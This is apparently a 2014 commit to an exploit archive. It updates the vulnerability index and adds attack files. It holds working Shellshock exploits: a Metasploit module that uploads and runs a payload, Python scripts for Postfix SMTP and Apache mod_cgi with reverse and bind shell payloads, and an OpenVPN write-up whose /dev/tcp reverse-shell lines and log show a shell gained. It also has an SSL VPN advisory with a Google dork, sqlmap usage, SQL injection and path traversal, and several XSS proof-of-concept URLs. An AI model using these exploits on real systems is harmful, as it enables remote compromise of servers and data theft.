Updated 10_08_2014

files.csv

@@ -31299,8 +31299,8 @@ id,file,description,date,author,platform,type,port
 34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
 34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php, file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
-34765,platforms/linux/remote/34765.txt,"GNU bash Environment Variable Command Injection",2014-09-25,"Stephane Chazelas",linux,remote,0
-34766,platforms/linux/remote/34766.php,"Bash Environment Variables Code Injection Exploit",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
+34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (ShellShock)",2014-09-25,"Stephane Chazelas",linux,remote,0
+34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (ShellShock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
 34767,platforms/windows/dos/34767.py,"BS.Player 2.56 '.m3u' and '.pls' File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,windows,dos,0
 34768,platforms/windows/remote/34768.c,"VirIT eXplorer 6.7.43 'tg-scan.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-27,anT!-Tr0J4n,windows,remote,0
 34769,platforms/php/webapps/34769.txt,"MySITE SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-27,MustLive,php,webapps,0
@@ -31406,6 +31406,7 @@ id,file,description,date,author,platform,type,port
 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0
 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 'search.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 'gamelist.php' Cross Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0
+34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - ShellShock Exploit",2014-10-04,"hobbily plunt",linux,remote,0
 34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 'document.write' Memory Corruption Vulnerability",2010-10-19,"Alexander Miller",linux,remote,0
 34882,platforms/php/webapps/34882.html,"sNews 1.7 'snews.php' Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
 34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 'cat' Parameter SQL Injection Vulnerability",2010-10-19,"High-Tech Bridge SA",php,webapps,0
@@ -31413,4 +31414,31 @@ id,file,description,date,author,platform,type,port
 34885,platforms/php/webapps/34885.txt,"Auction RSS Content Script rss.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0
 34886,platforms/php/webapps/34886.txt,"Auction RSS Content Script search.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0
 34887,platforms/php/webapps/34887.txt,"JCE-Tech PHP Video Script 'index.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
-34888,platforms/php/webapps/34888.html,"sNews 1.7 'snews.php' Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
+34888,platforms/php/webapps/34888.txt,"UloKI PHP Forum 2.1 'search.php' Cross Site Scripting Vulnerability",2009-08-19,Moudi,php,webapps,0
+34889,platforms/windows/dos/34889.vcf,"Microsoft Windows Mobile Overly Long vCard Name Field Denial of Service Vulnerability",2010-10-21,SecurityArchitect.Org,windows,dos,0
+34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0
+34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 'name' Parameter HTML Injection Vulnerability",2010-10-21,"SecPod Research",php,webapps,0
+34892,platforms/php/webapps/34892.txt,"pecio cms 2.0.5 'target' Parameter Cross Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0
+34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
+34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
+34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE (MSF) Shellshock Exploit",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
+34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0
+34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0
+34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles /riddles/results.php searchquery Parameter XSS",2009-08-20,Moudi,php,webapps,0
+34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0
+34904,platforms/php/webapps/34904.txt,"Radvision Scopia 'entry/index.jsp' Cross Site Scripting Vulnerability",2009-08-24,"Francesco Bianchino",php,webapps,0
+34905,platforms/php/webapps/34905.txt,"W-Agora <= 4.2.1 search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0
+34906,platforms/php/webapps/34906.txt,"W-Agora <= 4.2.1 search.php bn Parameter XSS",2010-10-22,MustLive,php,webapps,0
+34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for e-business ivt/ivtserver parm1 Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/acl method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/domain method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34910,platforms/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/group method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34911,platforms/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/gso method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34912,platforms/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/gsogroup method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34913,platforms/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/os method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34914,platforms/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/pop method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34915,platforms/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/rule method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34916,platforms/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/user method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
+34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
+34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0

platforms/cgi/webapps/34895.rb

@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Shellshock Bashed CGI RCE',
+      'Description'    => %q{
+          This module exploits the shellshock vulnerability in apache cgi. It allows you to
+        excute any metasploit payload you want.
+      },
+      'Author'         =>
+        [
+            'Stephane Chazelas',	# vuln discovery
+            'Fady Mohamed Osman'	# Metasploit module f.othman at zinad.net
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-6271' ]
+        ],
+      'Payload'	     =>
+        {
+          'BadChars' => "",
+        },
+        'Platform' => 'linux',
+        'Arch'		     => ARCH_X86,
+        'Targets'        =>
+        [
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
+        ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Aug 13 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) ,
+        OptString.new('FILEPATH', [true, 'The url ', '/tmp'])
+      ], self.class)
+  end
+
+  def exploit
+    @payload_name = "#{rand_text_alpha(5)}"
+    full_path = datastore['FILEPATH'] + '/' + @payload_name
+    payload_exe = generate_payload_exe
+    if payload_exe.blank?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
+    end
+    peer = "#{rhost}:#{rport}"
+    print_status("#{peer} - Creating payload #{full_path}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => datastore['TARGETURI'],
+      'agent'    => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" +  "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\""
+    })
+  end
+end

platforms/cgi/webapps/34918.txt

@@ -0,0 +1,137 @@
+Ultra Electronics / AEP Networks - SSL VPN (Netilla / Series A / Ultra
+Protect) Vulnerabilities
+ http://www.osisecurity.com.au/advisories/ultra-aep-netilla-vulnerabilities
+
+Release Date:
+ 02-Oct-2014
+
+Software:
+ Ultra Electronics - Series A
+ http://en.wikipedia.org/wiki/NetillaOS_NetConnect_by_Northbridge_Secure_Systems_(Secure_Remote_Access_SSL_VPN)
+
+Versions tested:
+ Version 7.2.0.19 and 7.4.0.7 have been confirmed as vulnerable. Other
+versions untested.
+
+Google Dork: inurl:/preauth/login.cgi
+Page 1 of about 321 results (0.25 seconds)
+
+URL:
+
+https://[target]/preauth/login.cgi?realm=local
+
+There are a few different issues with the 'realm' parameter.
+
+1) SQL injection. You can use sqlmap for this.
+
+./sqlmap.py -u "https://[target]/preauth/login.cgi?realm=abc" --level 5
+
+sqlmap identified the following injection points with a total of 927
+HTTP(s) requests:
+---
+Place: GET
+Parameter: realm
+    Type: boolean-based blind
+    Title: PostgreSQL stacked conditional-error blind queries
+    Payload: realm=-2661'); SELECT (CASE WHEN (9569=9569) THEN 9569
+ELSE 1/(SELECT 0) END);--
+---
+
+web application technology: Apache
+back-end DBMS operating system: Linux Red Hat
+back-end DBMS: PostgreSQL
+banner:    'PostgreSQL 8.3.4 on x86_64-redhat-linux-gnu, compiled by
+GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)'
+
+Funnily enough, a lot of the source code is commented with things like
+"#FIXME add param validation" as a reminder by the developer that the
+code doesn't validate input - but somehow made it into production.
+
+DB.pm line ~189 where realm is used in an SQL select:
+
+sub set_message {
+    my $self = shift;
+    warn(__PACKAGE__, "::set_message() called\n") if $self->{'debug'};
+
+    my ($key, $value) = @_; # FIXME add param validation
+
+    my $realm_name=$self->{'realm'};
+    my $c = $self->{'_dbh'};
+    my $locale = $self->{'locale'} ;
+    my $r      = $c->exec("
+                select * from set_realm_message('$realm_name',
+'$locale', '$key', '$value')
+                ");
+    if ($r->resultStatus ne PGRES_TUPLES_OK) {
+        return;
+    }
+    my $retval = $r->fetchrow;
+    return $retval;
+
+}
+
+2) The realm is also used in a perl based mkdir(). This allows you to
+create arbitrary folders, allows for path disclosure / checking files
+exist etc.
+
+Manager.pm line ~43:
+chown $uid, $gid, mkpath($path, 0);
+
+File.pm line ~160:
+my $parent = File::Basename::dirname($path);
+    unless (-d $parent or $path eq $parent) {
+        push(@created,mkpath($parent, $verbose, $mode));
+     }
+    print "mkdir $path\n" if $verbose;
+
+Examples:
+
+https://[target]/preauth/login.cgi?realm=../../../etc/hosts
+
+Error
+mkdir /tmp/netilla-cache/C11N_get_messages/../../../etc/hosts: File
+exists at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
+line 43
+Back
+
+https://[target]/preauth/login.cgi?realm=../../../../bin/
+
+Error
+mkdir /tmp/netilla-cache/C11N_get_messages/../../../../bin: Permission
+denied at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
+line 43
+Back
+
+The portal requires authentication to access "protected" areas but
+once you are authenticated, you can HTTP GET internal device
+configuration files and other resources that an authenticated user
+shouldn't be able to read.
+
+Credit:
+ This vulnerability was discovered by Patrick Webster.
+
+Disclosure timeline:
+ 28-May-2012 - Discovered during test.
+ 28-May-2012 - Vendor contact, referred to support and legal departments.
+ 19-Jun-2012 - Requested vendor update.
+ 20-Jun-2012 - Told to contact support email. Sent.
+ 19-Jul-2012 - Support request to close ticket. Told support no
+progress has been made. Support requires CVE to progress.
+ 23-Jul-2012 - Told support no CVE has been assigned. Support refuse
+to investigate without a CVE. Told to upgrade to newest release
+7.4.0.7. Confirmed as affected.
+ 14-Aug-2012 - Vendor support closing ticket, no investigation or patch.
+ 02-Oct-2014 - Public disclosure. Assumed vulnerable.
+
+ Note: Product is now known as NetillaOS by Northbridge Secure
+Systems. 2014 status unknown.
+
+About OSI Security:
+
+ OSI Security is an independent network and computer security auditing
+ and consulting company based in Sydney, Australia. We provide internal
+ and external penetration testing, vulnerability auditing and wireless
+ site audits, vendor product assessments, secure network design,
+ forensics and risk mitigation services.
+
+We can be found at http://www.osisecurity.com.au/

platforms/linux/remote/34879.txt

@@ -0,0 +1,106 @@
+# Exploit Title: ShellShock OpenVPN Exploit
+
+# Date: Fri Oct  3 15:48:08 EDT 2014
+
+# Exploit Author: hobbily AKA @fj33r
+
+# Version: 2.2.29
+
+# Tested on: Debian Linux
+
+# CVE : CVE-2014-6271
+
+#Probably should of submitted this the day I tweeted it.
+### server.conf
+port 1194
+proto udp
+dev tun
+client-cert-not-required
+auth-user-pass-verify /etc/openvpn/user.sh via-env
+tmp-dir "/etc/openvpn/tmp"
+ca ca.crt
+cert testing.crt
+key testing.key  # This file should be kept secret
+dh dh1024.pem
+server 10.8.0.0 255.255.255.0
+keepalive 10 120
+comp-lzo
+user nobody
+group nogroup
+persist-key
+persist-tun
+client-cert-not-required
+plugin /usr/lib/openvpn/openvpn-auth-pam.so login
+script-security 3
+status openvpn-status.log
+verb 3
+
+### user.sh
+#!/bin/bash
+echo "$username"
+echo "$password"
+
+### start server
+openvpn server.con
+
+### terminal 1
+nc -lp 4444
+
+### terminal 2
+sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
+
+### username && password were both shellshocked just incase
+user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
+pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
+
+### log
+Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
+Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
+Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
+Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
+Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
+Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
+Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
+Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
+Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
+Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
+Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
+Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
+Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
+Mon Sep 29 20:56:56 2014 GID set to nogroup
+Mon Sep 29 20:56:56 2014 UID set to nobody
+Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]
+Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
+Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
+Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
+Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
+Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
+Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
+Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
+Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
+Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
+Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'
+Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'
+Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
+AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
+Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
+Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
+_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__
+
+Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
+Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
+Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
+Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
+Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
+Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
+Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
+Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
+
+### nc listener
+nobody@debian:/etc/openvpn$ id
+id
+uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
+#shoutouts to Fredrik Str?mberg for the post he made on ycombinator
+
+
+ 		 	   		   		 	   		  

platforms/linux/remote/34896.py

@@ -0,0 +1,79 @@
+#!/bin/python
+# Exploit Title:  Shellshock SMTP Exploit
+# Date: 10/3/2014
+# Exploit Author: fattymcwopr
+# Vendor Homepage: gnu.org
+# Software Link: http://ftp.gnu.org/gnu/bash/
+# Version: 4.2.x < 4.2.48
+# Tested on: Debian 7 (postfix smtp server w/procmail)
+# CVE : 2014-6271
+
+from socket import *
+import sys
+
+def usage():
+    print "shellshock_smtp.py <target> <command>"
+
+argc = len(sys.argv)
+if(argc < 3 or argc > 3):
+    usage()
+    sys.exit(0)
+
+rport = 25
+rhost = sys.argv[1]
+cmd = sys.argv[2]
+
+headers = ([
+    "To",
+    "References",
+    "Cc",
+    "Bcc",
+    "From",
+    "Subject",
+    "Date",
+    "Message-ID",
+    "Comments",
+    "Keywords",
+    "Resent-Date",
+    "Resent-From",
+    "Resent-Sender"
+    ])
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((rhost, rport))
+
+# banner grab
+s.recv(2048*4)
+
+def netFormat(d):
+    d += "\n"
+    return d.encode('hex').decode('hex')
+
+data = netFormat("mail from:<>")
+s.send(data)
+s.recv(2048*4)
+
+data = netFormat("rcpt to:<nobody>")
+s.send(data)
+s.recv(2048*4)
+
+data = netFormat("data")
+s.send(data)
+s.recv(2048*4)
+
+data = ''
+for h in headers:
+    data += netFormat(h + ":() { :; };" + cmd)
+
+data += netFormat(cmd)
+
+# <CR><LF>.<CR><LF>
+data += "0d0a2e0d0a".decode('hex')
+
+s.send(data)
+s.recv(2048*4)
+
+data = netFormat("quit")
+s.send(data)
+s.recv(2048*4)
+

platforms/linux/remote/34900.py

@@ -0,0 +1,146 @@
+#! /usr/bin/env python
+from socket import *
+from threading import Thread
+import thread, time, httplib, urllib, sys 
+
+stop = False
+proxyhost = ""
+proxyport = 0
+
+def usage():
+	print """
+
+		Shellshock apache mod_cgi remote exploit
+
+Usage:
+./exploit.py var=<value>
+
+Vars:
+rhost: victim host
+rport: victim port for TCP shell binding
+lhost: attacker host for TCP shell reversing
+lport: attacker port for TCP shell reversing
+pages:  specific cgi vulnerable pages (separated by comma)
+proxy: host:port proxy
+
+Payloads:
+"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
+"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)
+
+Example:
+
+./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
+./exploit.py payload=bind rhost=1.2.3.4 rport=1234
+
+Credits:
+
+Federico Galatolo 2014
+"""
+	sys.exit(0)
+
+def exploit(lhost,lport,rhost,rport,payload,pages):
+	headers = {"Cookie": payload, "Referer": payload}
+	
+	for page in pages:
+		if stop:
+			return
+		print "[-] Trying exploit on : "+page
+		if proxyhost != "":
+			c = httplib.HTTPConnection(proxyhost,proxyport)
+			c.request("GET","http://"+rhost+page,headers=headers)
+			res = c.getresponse()
+		else:
+			c = httplib.HTTPConnection(rhost)
+			c.request("GET",page,headers=headers)
+			res = c.getresponse()
+		if res.status == 404:
+			print "[*] 404 on : "+page
+		time.sleep(1)
+		
+
+args = {}
+	
+for arg in sys.argv[1:]:
+	ar = arg.split("=")
+	args[ar[0]] = ar[1]
+try:
+	args['payload']
+except:
+	usage()
+	
+if args['payload'] == 'reverse':
+	try:
+		lhost = args['lhost']
+		lport = int(args['lport'])
+		rhost = args['rhost']
+		payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
+	except:
+		usage()
+elif args['payload'] == 'bind':
+	try:
+		rhost = args['rhost']
+		rport = args['rport']
+		payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
+	except:
+		usage()
+else:
+	print "[*] Unsupported payload"
+	usage()
+	
+try:
+	pages = args['pages'].split(",")
+except:
+	pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]
+
+try:
+	proxyhost,proxyport = args['proxy'].split(":")
+except:
+	pass
+			
+if args['payload'] == 'reverse':
+	serversocket = socket(AF_INET, SOCK_STREAM)
+	buff = 1024
+	addr = (lhost, lport)
+	serversocket.bind(addr)
+	serversocket.listen(10)
+	print "[!] Started reverse shell handler" 
+	thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
+if args['payload'] == 'bind':
+	serversocket = socket(AF_INET, SOCK_STREAM)
+	addr = (rhost,int(rport))
+	thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
+	
+buff = 1024
+	
+while True:
+	if args['payload'] == 'reverse':
+		clientsocket, clientaddr = serversocket.accept()
+		print "[!] Successfully exploited"
+		print "[!] Incoming connection from "+clientaddr[0]
+		stop = True
+		clientsocket.settimeout(3)
+		while True:
+			reply = raw_input(clientaddr[0]+"> ")
+			clientsocket.sendall(reply+"\n")
+			try:
+				data = clientsocket.recv(buff)
+				print data
+			except:
+				pass
+		
+	if args['payload'] == 'bind':
+		try:
+			serversocket = socket(AF_INET, SOCK_STREAM)
+			time.sleep(1)
+			serversocket.connect(addr)
+			print "[!] Successfully exploited"
+			print "[!] Connected to "+rhost
+			stop = True
+			serversocket.settimeout(3)
+			while True:
+				reply = raw_input(rhost+"> ")
+				serversocket.sendall(reply+"\n")
+				data = serversocket.recv(buff)
+				print data
+		except:
+			pass

platforms/multiple/webapps/34907.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable. 
+
+http://www.example.com/ivt/ivtserver?parm1=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

platforms/multiple/webapps/34908.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+ 
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable. 
+
+http://www.example.com/ibm/wpm/acl?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34909.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+  
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+  
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/domain?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34910.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+   
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+   
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/group?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34911.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+    
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+    
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/gso?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34912.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+     
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+     
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/gsogroup?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34913.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+      
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+      
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+      
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/os?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34914.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+       
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+       
